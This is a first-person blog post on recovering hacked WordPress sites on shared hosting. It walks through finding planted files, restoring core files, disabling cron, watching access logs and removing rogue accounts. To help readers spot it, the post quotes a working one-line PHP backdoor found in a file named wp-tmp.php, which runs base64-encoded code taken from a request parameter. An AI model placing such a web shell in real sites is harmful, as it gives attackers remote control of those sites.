In January, one of my website was hacked. The symptom was when I access the website, it only show a white screen in the browser. I didn’t pay much attention on that, just restore the whole website from a early backup. However, it was just the beginning of the nightmare. After one month, all my websites were hacked on the same share hosting. Now it becomes a serious problem. And two of my websites are already marked as “Malware code injection”. Then my cleaning hacked WordPress website journey is beginning.
How to Clean Hacked WordPress Website
All hacked websites are powered by WordPress. I think it will be very helpful if I share my experience about how to find out the hack files in WordPress website. Actually, there are several steps to find hack code and clean hacked WordPress Website.
Find Suspicious Files in WordPress Website
To clean a hacked WordPress website, the step 1 is finding all suspicious files in hacked WordPress website. If you are familiar with WordPress, it will be very easy to find suspicious files in WordPress website. If you are not familiar with WordPress, you can download the latest version of WordPress and then compare files with your hacked WordPress website. In my website, I find there is a file named “wp-tmp.php” in the root folder. This is the most common way in which hacker hide their backdoor script.
Suspicious file wp-tmp.php in Hacked WordPress Website
The “wp-tmp.php” looks very similar with other WordPress files, such as “wp-login.php”, “wp-settings.php”. However, “wp-tmp.php” is definitely a backdoor where hackers will use this file to access your WordPress website and inject malware in your website. The “wp-tmp.php” looks like this:
<?php $p = $_REQUEST["m"]; eval(base64_decode($p)); ?>
Backdoor in WordPress Uploads Folder
Step 2 to clean hacked WordPress website is searching harmful code in uploads folder. The “wp-content/uploads” folder in WordPress is another place where hackers like to put their malware code. Because the uploads folder contains all media files we upload to our website, we will not delete this folder when we clean the hacked website. So when you are cleaning a hacked WordPress site, you must search this folder to check if there are some php files inside.
Clean a Hacked WordPress Site in 5 Minutes
Step 3 to clean hacked WordPress site is deleting all hacked files. After I find all suspicious files in hacked WordPress Website, simply deleting these files is not enough. Many hackers like to change WordPress system file to inject some harmful code inside. This type of hacked files is very hard to find and clean. So the best way to clean your hacked WordPress website is deleting all WordPress system files, and backup the “wp-content” folder and “wp-config.php” file in root folder.
Restore Clean WordPress System Files
Step 4 is restoring WordPress system files. This step is quite simple. I download the latest WordPress source code from wordpress.org and copy all WordPress files to my website. Please remember to upload your own “wp-content” folder and “wp-config.php” file which you backup in step 3.
Stop WordPress Cron Job
Step 5 is stoping cron job in WordPress. Though this step may not be necessary, it is better to keep your website safe. As my clean hacked WordPress experience, some sophisticated hackers will hide their injection code in database and use WordPress cron job to run this harmful code, then hacked your WordPress website again.
To stop cron job in WordPress, you can edit the “wp-config.php” file:
Another way to stop cron job is rename the “wp-cron.php” file or delete it. In my website, I take both of above actions.
Ask Google to Review Your Website
If your hacked website is already marked as malware website by google, you have to ask google to review your website. First, you can register to Google webmaster. For more information, you can check this Google official document:
Prevent Your Website Being Hacked
After you clean the hacked WordPress site successfully, you should keep watching on the website at least for 2 or 3 days. Hackers will try their best to hack your website again when they find they lose the control of your website. Therefore, it is very important to check the raw access log of your website. If your website is hacked again, at least you will find where hackers walk in your website. Then you just repeat the above steps and close the backdoor. Therefore, you should keep watching the access log until there is no suspicious access. Here is my raw access log example. The website was hacked again after I clean my hacked WordPress website. So I delete all WordPress system files and stop my cron job in WordPress.
Avoid Brute Force Login
Brute force attack is the most common way to hack website to get username and password. Lots of people use some brute force attack web service to attack WordPress powered website to get the admin username and password. Here is how it looks like in access log:
To keep our website safe, we must take some actions to protect our website. Here is an article to talk about how to avoid login page brute force attack.
Delete Unknown Account
What’s the simplest back door in a hacked website? The answer is an administrator account. That’s right. Please really don’t forget to check if there are unusual account in your website. It is very simple to check it. Just go to your website backend and check the account list. Delete all unnecessary accounts you don’t need.
Change Your Administrator Password
When your website is compromised, your username and password may already leak out. In my hacked WordPress website, the file “wp-includes/user.php” is injected with hacked code. I guess this injected hack code will get all plain user name and password when we try to login with our username and password. Therefore, the last step to clean up your website is changing your administrator password.